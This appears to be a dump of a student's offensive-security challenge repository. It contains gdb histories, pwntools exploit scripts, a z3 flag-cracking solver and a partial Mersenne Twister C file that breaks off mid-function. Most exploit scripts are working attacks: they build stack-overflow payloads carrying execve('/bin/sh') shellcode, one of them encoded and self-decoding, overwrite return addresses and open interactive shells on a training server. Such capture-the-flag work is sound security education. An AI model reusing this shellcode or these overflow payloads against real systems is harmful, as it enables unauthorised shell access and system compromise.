https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/sh3llc0d3/sh3llc0d3 -------------------------------------------------------------------------------- /shellcode/shellcode/.gdb_history: -------------------------------------------------------------------------------- 1 | b *0x00400729 2 | run 3 | cyclic -l eaakfaak 4 | cyclic -l eaak 5 | q 6 | b *0x00400729 7 | r 8 | c 9 | ni 10 | q 11 | c 12 | q 13 | c 14 | ni 15 | q 16 | c 17 | ni 18 | q 19 | c 20 | ni 21 | q 22 | c 23 | ni 24 | q 25 | c 26 | q 27 | -------------------------------------------------------------------------------- /shellcode/shellcode/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 2001 shellcode 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('shellcode') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 2001) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Partial RELRO 52 | # Stack: No canary found 53 | # NX: NX disabled 54 | # PIE: No PIE (0x400000) 55 | # RWX: Has RWX segments 56 | 57 | point = 1016 58 | buffer_addr = p64(0x00601080) 59 | displace = b'\x90' * 8 60 | 61 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 62 | 63 | io = start() 64 | io.sendline(displace + sh + b'\x90' * (point - len(sh) - 16) + displace + buffer_addr + b'\x90' * 8) 65 | io.sendline(b'ls') 66 | 67 | io.interactive() 68 | 69 | -------------------------------------------------------------------------------- /shellcode/shellcode/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/shellcode/shellcode -------------------------------------------------------------------------------- /shellcode/syscall/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 3101 syscall 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('syscall') 9 | context.terminal = ['mate-terminal', '-e'] 10 | 11 | # Many built-in settings can be controlled on the command-line and show up 12 | # in "args". For example, to dump all data sent/received, and disable ASLR 13 | # for all created processes... 14 | # ./exploit.py DEBUG NOASLR 15 | # ./exploit.py GDB HOST=example.com PORT=4141 16 | host = args.HOST or 'training.jinblack.it' 17 | port = int(args.PORT or 3101) 18 | 19 | def local(argv=[], *a, **kw): 20 | '''Execute the target binary locally''' 21 | if args.GDB: 22 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 23 | else: 24 | return process([exe.path] + argv, *a, **kw) 25 | 26 | def remote(argv=[], *a, **kw): 27 | '''Connect to the process on the remote host''' 28 | io = connect(host, port) 29 | if args.GDB: 30 | gdb.attach(io, gdbscript=gdbscript) 31 | return io 32 | 33 | def start(argv=[], *a, **kw): 34 | '''Start the exploit against the target.''' 35 | if args.LOCAL: 36 | return local(argv, *a, **kw) 37 | else: 38 | return remote(argv, *a, **kw) 39 | 40 | # Specify your GDB script here for debugging 41 | # GDB will be launched if the exploit is run via e.g. 42 | # ./exploit.py GDB 43 | gdbscript = ''' 44 | tbreak main 45 | break *0x00401270 46 | continue 47 | '''.format(**locals()) 48 | 49 | #=========================================================== 50 | # EXPLOIT GOES HERE 51 | #=========================================================== 52 | # Arch: amd64-64-little 53 | # RELRO: Partial RELRO 54 | # Stack: No canary found 55 | # NX: NX disabled 56 | # PIE: No PIE (0x400000) 57 | # RWX: Has RWX segments 58 | 59 | sh = b'\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24' 60 | point = 216 61 | buffer_addr = p64(0x00404080) 62 | 63 | payload = sh + b'\x90' * (point - len(sh)) + buffer_addr 64 | payload += b'\x90' * (1000 - len(payload)) 65 | 66 | print(len(payload)) 67 | input() 68 | 69 | io = start() 70 | 71 | io.sendline(payload) 72 | 73 | io.interactive() 74 | 75 | -------------------------------------------------------------------------------- /shellcode/syscall/syscall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/syscall/syscall -------------------------------------------------------------------------------- /shellcode/syscaslr/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 3101 syscall 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('syscaslr') 9 | context.terminal = ['mate-terminal', '-e'] 10 | 11 | # Many built-in settings can be controlled on the command-line and show up 12 | # in "args". For example, to dump all data sent/received, and disable ASLR 13 | # for all created processes... 14 | # ./exploit.py DEBUG NOASLR 15 | # ./exploit.py GDB HOST=example.com PORT=4141 16 | host = args.HOST or 'training.jinblack.it' 17 | port = int(args.PORT or 3102) 18 | 19 | def local(argv=[], *a, **kw): 20 | '''Execute the target binary locally''' 21 | if args.GDB: 22 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 23 | else: 24 | return process([exe.path] + argv, *a, **kw) 25 | 26 | def remote(argv=[], *a, **kw): 27 | '''Connect to the process on the remote host''' 28 | io = connect(host, port) 29 | if args.GDB: 30 | gdb.attach(io, gdbscript=gdbscript) 31 | return io 32 | 33 | def start(argv=[], *a, **kw): 34 | '''Start the exploit against the target.''' 35 | if args.LOCAL: 36 | return local(argv, *a, **kw) 37 | else: 38 | return remote(argv, *a, **kw) 39 | 40 | # Specify your GDB script here for debugging 41 | # GDB will be launched if the exploit is run via e.g. 42 | # ./exploit.py GDB 43 | gdbscript = ''' 44 | tbreak main 45 | break prog 46 | continue 47 | '''.format(**locals()) 48 | 49 | #=========================================================== 50 | # EXPLOIT GOES HERE 51 | #=========================================================== 52 | # Arch: amd64-64-little 53 | # RELRO: Partial RELRO 54 | # Stack: No canary found 55 | # NX: NX disabled 56 | # PIE: No PIE (0x400000) 57 | # RWX: Has RWX segments 58 | 59 | sh = b'\x48\xC7\x40\x32\x0E\x00\x00\x00\x48\xC7\x40\x33\x04\x00\x00\x00\x48\xFF\x40\x32\x48\xFF\x40\x33' 60 | sh += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b' 61 | 62 | payload = sh.ljust(1000, b'\x90') 63 | 64 | print(len(payload)) 65 | 66 | io = start() 67 | 68 | io.sendline(payload) 69 | 70 | io.interactive() 71 | 72 | -------------------------------------------------------------------------------- /shellcode/syscaslr/syscaslr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/shellcode/syscaslr/syscaslr -------------------------------------------------------------------------------- /symbolic/cracksymb/cracksymb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/symbolic/cracksymb/cracksymb -------------------------------------------------------------------------------- /symbolic/cracksymb/exploit.py: -------------------------------------------------------------------------------- 1 | from z3 import * 2 | 3 | flag = [BitVec(f'{i}', 8) for i in range(23)] 4 | 5 | s = Solver() 6 | 7 | for i in range(23): 8 | s.add(flag[i] >= 0x20) 9 | s.add(flag[i] <= 0x7E) 10 | 11 | s.add (flag[0xb] * -0x19 + 12 | flag[8] * 0x31 + flag[10] * 0xbb + -0x9c2a + flag[1] * 0x39 + flag[2] * 3 + 13 | flag[0x16] * 0xd7 + flag[9] * -0xbd + flag[0xc] * -0x47 + flag[0xd] * 0xb7 + 14 | flag[0xf] * -0x9b + flag[3] * 0x73 + flag[0x13] * -0x95 + flag[0xe] * 0xc6 + 15 | flag[4] * 0x9a + flag[0x11] * -0x66 + flag[0x10] * 0x7c + flag[0x12] * 0xb9 + 16 | flag[6] * -0xaa + flag[5] * -0x6a + flag[0x15] * 0xe1 + flag[0x14] * -0xa6 + 17 | flag[7] * -0xb5 + flag[0] * -0xb7 == 0) 18 | s.add (flag[0x15] * -0x55 + 19 | flag[0xe] * -0xe5 + 20 | flag[8] * -0xae + flag[6] * -0x58 + flag[0x14] * 0x7d + flag[1] * -0x3c + 21 | flag[0xf] * 0xe0 + flag[10] * 0xfc + flag[2] * -0x5e + flag[0x12] * -0xe0 + 22 | flag[5] * 0xee + flag[0x10] * 0xe7 + flag[7] * -0x61 + flag[0xb] * -0x89 + 23 | flag[4] * -0x80 + flag[0] * -0xfd + flag[0xc] * -0x9e + 0x9a2e + 24 | flag[0x16] * 2 + flag[0x16] * -0x10 + flag[0x13] * -0x11 + flag[0x11] * 0x30 + 25 | flag[0xd] * 0x83 + flag[9] * -0xde + flag[3] * 0xe2 == 0) 26 | s.add (flag[0x10] * -0x39 + 27 | flag[0x16] * 0xc6 + 28 | flag[0x15] * -0x6c + flag[9] * 0xd4 + flag[0xf] * -0xe2 + flag[0xd] * 0xc5 + 29 | flag[0x14] * 0x91 + flag[2] * 0x84 + flag[1] * 0x32 + flag[0xe] * 0x86 + 30 | -0x3124d + flag[5] * 0xd2 + flag[0x11] * 0xea + flag[0xb] * 0x1b + 31 | flag[0x12] * 0x97 + flag[3] * 0xf0 + flag[4] * -0x8a + flag[0xc] * 0x95 + 32 | flag[0x13] * 0x9f + flag[7] * -0x29 + flag[8] * 0xb3 + flag[0] * -0x31 + 33 | flag[10] * 0xd1 + flag[6] * 0x32 == 0) 34 | s.add (flag[7] * 0x5f + 35 | flag[10] * 0x60 + 36 | flag[0x14] * 0x8d + flag[0xc] * 0xab + flag[6] * -0x1a + flag[0xe] * 0xcb + 37 | flag[2] * 0x57 + flag[0x13] * -0x8d + flag[0x16] * -0xba + flag[0xf] * 0xa9 38 | + flag[0x10] * -0x14 + flag[5] * 0x52 + flag[0x11] * -0x23 + flag[1] * -0x68 39 | + flag[0x15] * 199 + flag[0x12] * 0x57 + flag[0xd] * 0xeb + flag[8] * -0xa8 40 | + flag[9] * 0x85 + flag[0] * -0x62 + -0x20c1e + flag[4] * 0xaf + 41 | flag[3] * -0x26 + flag[0xb] * 0xfb == 0) 42 | s.add (flag[0xb] * 0x23 + 43 | flag[3] * -0x80 + flag[0x12] * 0xd0 + flag[0xd] * 0x8a + -0x1b8ed + 44 | flag[0] * -0x51 + flag[2] * 0x8c + flag[1] * 4 + flag[0x13] * 0x86 + 45 | flag[4] * 0xf0 + flag[5] * -0xc4 + flag[9] * -0x55 + flag[0x14] * 0xd8 + 46 | flag[0x11] * -0xb5 + flag[0xe] * -0x14 + flag[7] * 0xea + flag[10] * -0xc3 47 | + flag[8] * 0xeb + flag[0xf] * 0xba + flag[0x10] * -0xf5 + 48 | flag[0x15] * 0xe7 + flag[0xc] * 0x97 + flag[0x16] * 0x97 + flag[6] * -0x4e 49 | == 0) 50 | s.add (flag[0xc] * 0xd6 + 51 | flag[0x11] * -0x80 + 52 | flag[3] * 0x21 + flag[0xf] * -0xe8 + flag[10] * 0xd + flag[4] * -0x7b + 53 | flag[0x12] * 0x5a + flag[0x13] * 0xda + flag[6] * -0x66 + 54 | flag[1] * -0x98 + flag[8] * 0x23 + flag[0x14] * 0x16 + 55 | flag[0x15] * -0x89 + flag[9] * -0xba + flag[7] * 0x53 + flag[0xb] * 0x6e 56 | + flag[2] * 0x8e + flag[5] * -0xe5 + flag[0xd] * 0xc5 + flag[0x10] * -7 57 | + flag[0x16] * -0xee + flag[0] * 0xed + flag[0xe] * 0xab + -0x3da5 == 0) 58 | s.add (flag[1] * 0xa8 + 59 | flag[7] * -0xa6 + 60 | ((flag[6] * 0x7a + flag[2] * -0x50 + flag[0x12] * 0xdd + 61 | flag[4] * -0xa7 + flag[5] * 0x8b + flag[0xc] * -0x26 + 62 | flag[8] * -0x8c + flag[0x10] * -0x9f + flag[10] * -0xc6) - 63 | flag[0x16]) + flag[0xe] * -0x35 + flag[9] * 0xe + 64 | flag[0x14] * -0x6f + flag[0xb] * 0x91 + 0xb2a6 + flag[0x11] * -0x8d + 65 | flag[0xd] * -0xd + flag[3] * 0x39 + flag[0] * -0xcc + flag[0xf] * -0x45 66 | + flag[0x13] * 0xe9 + flag[0x15] * -0x6a == 0) 67 | s.add (flag[0xe] * 0xe + 68 | flag[0x15] * 0xeb + 69 | flag[10] * 0x12 + flag[0x13] * 0xa3 + flag[3] * 0xa5 + 70 | flag[4] * 0xb3 + flag[0xf] * -0x10 + flag[0xc] * -0x4d + 71 | flag[2] * -0x65 + flag[0x10] * 0xc1 + flag[0x16] * 0x43 + -0x20fdc + 72 | flag[0x11] * 0xeb + flag[0x14] * 0xb4 + flag[5] * 0x33 + 73 | flag[0xd] * -0xe7 + flag[9] * 0x7a + flag[0] * -0x42 + flag[1] * 0xca 74 | + flag[7] * 0xca + flag[8] * 0x35 + flag[0xb] * 0x4e + 75 | flag[0x12] * 0x4d + flag[6] * -0xbe == 0) 76 | s.add (flag[0x11] * -199 + 77 | flag[10] * -0x4e + 78 | flag[5] * -0xd8 + flag[0xd] * -0x17 + flag[7] * 0xc5 + 79 | flag[0xe] * 0x43 + flag[0x10] * 0xc4 + flag[0xf] * 0xaa + 0x4867 + 80 | flag[1] * -0xf5 + flag[3] * -0xa1 + flag[9] * 0x55 + 81 | flag[0x15] * 0x67 + flag[0xc] * -0x4e + flag[0x13] * 8 + 82 | flag[0] * -0xd3 + flag[0x16] * -0xb2 + flag[8] * 0x2d + 83 | flag[0xb] * -0xf + flag[4] * 0xd1 + flag[6] * 0xf2 + 84 | flag[2] * 0xf0 + flag[0x14] * -0x5b + flag[0x12] * 0x47 == 0) 85 | s.add (flag[0x15] * 0xed + 86 | flag[0xe] * 0x5b + 87 | flag[4] * -0xf + flag[9] * -0xfd + flag[6] * 99 + 88 | flag[2] * -0xd1 + flag[0] * 0xf7 + flag[0x13] * 0xc3 + 89 | flag[0xf] * -0x6f + flag[8] * 0xca + flag[0x10] * 0x4a + 90 | flag[0x14] * 0xf9 + flag[3] * 0xd3 + -0x130f0 + flag[0x11] * -0xfc 91 | + flag[0x16] * -0xda + flag[5] * 0x56 + flag[10] * 0x3b + 92 | flag[0xb] * 0x87 + flag[0xd] * -0x3a + flag[0xc] * -0xa9 + 93 | flag[0x12] * 0xbb + flag[1] * 0xb4 + flag[7] * 0x8f == 0) 94 | s.add (flag[0xf] * -0x20 + 95 | flag[0x16] * -0x22 + 96 | flag[0x15] * -0x7b + flag[0xb] * -99 + flag[0x13] * 0x86 + 97 | flag[0xe] * 0x9c + flag[5] * 0x89 + flag[0xd] * 0xe3 + 98 | flag[0x10] * -0x7c + flag[3] * -0x9c + 0x8354 + flag[0] * -0x45 + 99 | flag[1] * -0x51 + flag[0x11] * -0x7d + flag[7] * -0xa7 + 100 | flag[6] * 0xaf + flag[8] * -0xcf + flag[0x12] * -0xbf + 101 | flag[0x14] * 0x22 + flag[4] * -0x3a + flag[10] * -0x47 + 102 | flag[0xc] * -0x5d + flag[2] * 0xfe + flag[9] * 0xc9 == 0) 103 | s.add (flag[10] * 0xcc + 104 | flag[0x13] * 0x33 + 105 | flag[2] * -0x69 + flag[3] * -0xa3 + flag[0x10] * 0x60 + 106 | flag[5] * 0xea + flag[0xb] * -0xb5 + flag[0xc] * 0x2a + 107 | flag[0x14] * 0xf1 + flag[6] * 0xb1 + flag[0xe] * -0x14 + 108 | flag[9] * 0x86 + flag[0x12] * -0x65 + -0x53c7 + flag[1] * -0x48 109 | + flag[4] * -0x30 + flag[0xf] * -0xde + flag[0x15] * -0x3e + 110 | flag[0] * 0x57 + flag[8] * -0x37 + flag[0xd] * 0x5a + 111 | flag[0x16] * 0x6c + flag[0x11] * 0xd6 + flag[7] * -0xe2 == 0) 112 | s.add (flag[4] * 0x39 + 113 | flag[8] * 0x23 + 114 | flag[3] * -0x4e + flag[0xb] * -0x99 + flag[0xe] * 0x47 + 115 | flag[6] * -0xa7 + flag[9] * 0x74 + flag[0x14] * 2 + 0x2d4f + 116 | flag[0x12] * -0x50 + flag[0xd] * -0xb8 + flag[0x16] * -0x4f + 117 | flag[0x10] * -0x31 + flag[0xf] * 0xf2 + flag[0] * -7 + 118 | flag[0xc] * -0xa4 + flag[0x11] * 0xc4 + flag[7] * -0x28 + 119 | flag[0x13] * -0xb8 + flag[5] * 0xf0 + flag[1] * 0x1a + 120 | flag[2] * -0x84 + flag[10] * 0x8d + flag[0x15] * -2 == 0) 121 | s.add (flag[4] * 0xa8 + 122 | flag[7] * 0xe1 + 123 | flag[0x12] * -0x1a + flag[2] * -0x3d + flag[0xf] * -0xc9 + 124 | flag[0x16] * -0x7f + flag[0] * 0x2c + 0xeb6 + 125 | flag[0xb] * 0x71 + flag[0x13] * -0x8f + flag[0x10] * -0xdd 126 | + flag[10] * -0xe1 + flag[6] * -0xbb + flag[0x14] * 0x48 + 127 | flag[0xe] * -0xb6 + flag[0xd] * 0xdc + flag[3] * 0xf2 + 128 | flag[0x15] * -0x88 + flag[0xc] * -0x2e + flag[0x11] * 3 + 129 | flag[5] * 0xb8 + flag[9] * 0x8c + flag[8] * -0x77 + 130 | flag[1] + flag[1] * -8 == 0) 131 | s.add (flag[3] * 0xad + 132 | flag[2] * 0x82 + flag[0xf] * 0xa7 + flag[7] * 0xd0 + 133 | flag[0x14] * -0x4f + flag[0xc] * -0x91 + 134 | flag[0x11] * -0x5a + flag[0x13] * -0x100 + 135 | flag[0x10] * 0x27 + flag[8] * 0xec + flag[0xb] * 0x3c + 136 | flag[6] * -0x4a + flag[5] * -0x1b + flag[4] * -0x47 + 137 | flag[9] * 0x8c + flag[0] * -0x8e + flag[0x16] * 0x65 + 138 | flag[10] * -0xb9 + flag[0x15] * 0x74 + flag[0xd] * -0x86 139 | + flag[0xe] * 0x9e + flag[1] * 0xbb + flag[0x12] * -0x48 140 | == 0x6469) 141 | s.add (flag[0x12] * -0xc0 + 142 | flag[4] * 0xe7 + 143 | flag[5] * 9 + flag[8] * 0xa4 + flag[0x15] * 0xf6 + 144 | flag[2] * 0xd9 + flag[0x11] * 0x57 + flag[0xc] * -0x88 145 | + flag[3] * 0xdd + flag[0x10] * -0x8a + flag[6] * -0x97 146 | + flag[1] * 0x57 + flag[0x13] * 0xe2 + flag[7] * 0x61 + 147 | flag[0x16] * 0x6c + flag[0x14] * -0xd0 + -0x1e27d + 148 | flag[0xf] * 0x46 + flag[9] * 0xf0 + flag[0] * 0x5a + 149 | flag[0xd] * -0x52 + flag[10] * 0xb9 + flag[0xb] * 0xb4 150 | + flag[0xe] * -0xf8 == 0) 151 | s.add (flag[3] * 0xc + 152 | flag[0xe] * 0x85 + 153 | flag[6] * -0xa9 + flag[0xb] * -0x36 + 154 | flag[0x13] * -0x93 + flag[8] * -0x17 + flag[5] * 6 + 155 | flag[0x14] * 0x99 + flag[0x10] * 0xd4 + 156 | flag[0xf] * 0xf2 + flag[0xc] * 0xb5 + 157 | flag[10] * -0xb8 + flag[2] * -0x35 + flag[9] * -0x98 158 | + flag[0xd] * -0xe5 + -0x65d + flag[4] * 0x3f + 159 | flag[0] * 0x9d + flag[1] * 0xe + flag[0x11] * 0xe + 160 | flag[0x16] * -0xdb + flag[0x12] * 0x61 + 161 | flag[7] * 0x1b + flag[0x15] * -0x97 == 0) 162 | s.add (flag[9] * 0xf6 + 163 | flag[4] * -0x28 + 0x11400 + flag[0xc] * -0xb2 + 164 | flag[10] * -0xe2 + flag[0xd] * -0x90 + 165 | flag[0x16] * 0x62 + flag[6] * 0xd3 + 166 | flag[0x11] * -0x7a + flag[0xb] * -0xad + 167 | flag[8] * 0x1d + flag[0x14] * 0x48 + 168 | flag[2] * -0x17 + flag[7] * -0x34 + flag[3] * 0x9b 169 | + flag[0x13] * -0x12 + flag[0xf] * 0x7a + 170 | flag[0x15] * -0x83 + flag[0x10] * 0xac + 171 | flag[5] * -0xe3 + flag[0xe] * -0xb5 + 172 | flag[0x12] * -0x8f + flag[0] * 0xfc == 0) 173 | s.add (flag[0x12] * -0x32 + 174 | flag[0x13] * 0x50 + 175 | flag[4] * -0x4f + flag[0xb] * 0x4f + flag[0] * 0x33 176 | + flag[3] * -0xab + flag[8] * -0x98 + 177 | flag[0x15] * -0xcb + flag[0x16] * 0x6a + 178 | flag[9] * 0x95 + 0xfde0 + flag[2] * -0xc1 + 179 | flag[6] * -0x99 + flag[5] * -0x40 + 180 | flag[0x14] * -0x72 + flag[0xf] * -0xf9 + 181 | flag[0xc] * -0xfb + flag[1] * 0xdc + 182 | flag[0xe] * -0xf9 + flag[0x11] * 0x17 + 183 | flag[0x10] * -0x14 + flag[7] * 0x7a + 184 | flag[0xd] * 0x3d + flag[10] * 0xdd == 0) 185 | s.add (flag[0x16] * -0xfd + 186 | flag[4] * 0x85 + 187 | flag[0xb] * -0x29 + flag[0x11] * 0x2a + 188 | flag[0] * 0xe3 + flag[1] * -0x84 + flag[9] * 0xad 189 | + flag[6] * 0x4c + flag[0x14] * 0xf4 + 190 | flag[5] * -0x2d + -0x21cf + flag[7] * -0xc6 + 191 | flag[0xe] * 0x4c + flag[0x15] * -0x5a + 192 | flag[3] * 0x65 + flag[0xf] * -0xfe + 193 | flag[8] * -0x29 + flag[2] * -0x17 + 194 | flag[0x13] * 0x8a + flag[0xd] * -0x78 + 195 | flag[0x10] * 0x6d + flag[0x12] * -0x30 + 196 | flag[10] * 0xa1 + flag[0xc] * 0x8a == 0) 197 | s.add (flag[10] * -0xb + 198 | flag[0xe] * 0x54 + 199 | flag[0x14] * 0x5b + flag[2] * 0xda + 200 | flag[3] * -0x8e + flag[0x13] * 0x4c + 201 | flag[0x15] * -0xec + flag[0x10] * -0x81 + 202 | flag[9] * -0x5c + flag[0x16] * -0xdd + 203 | flag[4] * 0xac + flag[0xf] * 0xe5 + 204 | flag[7] * -0xf9 + flag[8] * -0x32 + 205 | flag[5] * 0xbd + flag[0x12] * -0xbd + 206 | flag[0xd] * -100 + flag[0xb] * 0x5d + 207 | flag[1] * 0x8b + flag[0xc] * 0x89 + 208 | flag[0] * -0x1e + flag[0x11] * -0x7c + -0x9bf + 209 | flag[6] * -0x1e == 0) 210 | s.add (flag[0xb] * -0xe2 + 211 | flag[6] * -0x4b + 212 | flag[0x15] * -10 + flag[8] * 0x33 + 213 | flag[0x16] * 0x72 + flag[0x14] * -0x80 + 214 | flag[5] * -0xdf + flag[7] * 0xf9 + 215 | flag[4] * 0x11 + flag[0x11] * -0xc1 + 216 | flag[0] * 0x74 + flag[0x12] * 0xf6 + 217 | flag[0x10] * 0xdc + flag[0xf] * 0x65 + 218 | flag[0xe] * 0xb2 + flag[0xc] * -0x42 + 219 | flag[10] * -0x42 + flag[2] * 0x24 + 220 | flag[9] * -0xd4 + flag[0x13] * 0x73 + 221 | flag[0xd] * -0x86 + flag[3] * 0xd7 + -0xe3f6 + 222 | flag[1] * 0x76 == 0) 223 | s.add (flag[0x10] * -0x9c + 224 | flag[2] * 0x67 + 225 | flag[0xc] * -0x23 + flag[8] * -0x48 + 226 | flag[6] * -0xd7 + flag[7] * -0x84 + 227 | flag[1] * 10 + flag[0xe] * -0xd7 + 228 | flag[0xb] * 0x62 + flag[0xf] * -0x51 + 229 | flag[0] * 0xbc + flag[0x16] * -0x4c + 0xd3bb + 230 | flag[0x13] * -0x98 + flag[0xd] * -0x53 + 231 | flag[0x11] * -0x77 + flag[0x15] * -0x6c + 232 | flag[3] * 0x74 + flag[0x14] * 0x38 + 233 | flag[5] * 0x46 + flag[9] * -0x9c + 234 | flag[4] * 0xdb + flag[10] * -0x76 + 235 | flag[0x12] * 0x2e == 0) 236 | 237 | 238 | print(s.check()) 239 | 240 | m = s.model() 241 | 242 | for i in range(len(flag)): 243 | print(chr(m[flag[i]].as_long()), end='') 244 | -------------------------------------------------------------------------------- /symbolic/prng/.gdb_history: -------------------------------------------------------------------------------- 1 | b *0x001014c8 2 | r 3 | c 4 | r 5 | delete breakpoint 6 | info b 7 | disass main 8 | disass genRandLong 9 | b genRandLong+536 10 | b *genRandLong+536 11 | r 12 | c 13 | c 14 | ni 15 | c 16 | c 17 | q 18 | q 19 | -------------------------------------------------------------------------------- /symbolic/prng/MTwister/mtwister.c: -------------------------------------------------------------------------------- 1 | /* An implementation of the MT19937 Algorithm for the Mersenne Twister 2 | * by Evan Sultanik. Based upon the pseudocode in: M. Matsumoto and 3 | * T. Nishimura, "Mersenne Twister: A 623-dimensionally 4 | * equidistributed uniform pseudorandom number generator," ACM 5 | * Transactions on Modeling and Computer Simulation Vol. 8, No. 1, 6 | * January pp.3-30 1998. 7 | * 8 | * http://www.sultanik.com/Mersenne_twister 9 | */ 10 | 11 | #define UPPER_MASK 0x80000000 12 | #define LOWER_MASK 0x7fffffff 13 | #define TEMPERING_MASK_B 0x9d2c5680 14 | #define TEMPERING_MASK_C 0xefc60000 15 | 16 | #include "mtwister.h" 17 | 18 | inline static void m_seedRand(MTRand* rand, unsigned long seed) { 19 | /* set initial seeds to mt[STATE_VECTOR_LENGTH] using the generator 20 | * from Line 25 of Table 1 in: Donald Knuth, "The Art of Computer 21 | * Programming," Vol. 2 (2nd Ed.) pp.102. 22 | */ 23 | rand->mt[0] = seed & 0xffffffff; 24 | for(rand->index=1; rand->indexindex++) { 25 | rand->mt[rand->index] = (6069 * rand->mt[rand->index-1]) & 0xffffffff; 26 | } 27 | } 28 | 29 | /** 30 | * Creates a new random number generator from a given seed. 31 | */ 32 | MTRand seedRand(unsigned long seed) { 33 | MTRand rand; 34 | m_seedRand(&rand, seed); 35 | return rand; 36 | } 37 | 38 | /** 39 | * Generates a pseudo-randomly generated long. 40 | */ 41 | unsigned long genRandLong(MTRand* rand) { 42 | 43 | unsigned long y; 44 | static unsigned long mag[2] = {0x0, 0x9908b0df}; /* mag[x] = x * 0x9908b0df for x = 0,1 */ 45 | if(rand->index >= STATE_VECTOR_LENGTH || rand->index < 0) { 46 | /* generate STATE_VECTOR_LENGTH words at a time */ 47 | int kk; 48 | if(rand->index >= STATE_VECTOR_LENGTH+1 || rand->index < 0) { 49 | m_seedRand(rand, 4357); 50 | } 51 | for(kk=0; kkmt[kk] & UPPER_MASK) | (rand->mt[kk+1] & LOWER_MASK); 53 | rand->mt[kk] = rand->mt[kk+STATE_VECTOR_M] ^ (y >> 1) ^ mag[y & 0x1]; 54 | } 55 | for(; kkmt[kk] & UPPER_MASK) | (rand->mt[kk+1] & LOWER_MASK); 57 | rand->mt[kk] = rand->mt[kk+(STATE_VECTOR_M-STATE_VECTOR_LENGTH)] ^ (y >> 1) ^ mag[y & 0x1]; 58 | } 59 | y = (rand->mt[STATE_VECTOR_LENGTH-1] & UPPER_MASK) | (rand->mt[0] & LOWER_MASK); 60 | rand->mt[STATE_VECTOR_LENGTH-1] = rand->mt[STATE_VECTOR_M-1] ^ (y >> 1) ^ mag[y & 0x1]; 61 | rand->index = 0; 62 | } 63 | y = rand->mt[rand->index++]; 64 | y ^= (y >> 11); 65 | y ^= (y << 7) & TEMPERING_MASK_B; 66 | y ^= (y << 15) & TEMPERING_MASK_C; 67 | y ^= (y >> 18); 68 | return y; 69 | } 70 | 71 | /** 72 | * Generates a pseudo-randomly generated double in the range [0..1]. 73 | */ 74 | double genRand(MTRand* rand) { 75 | 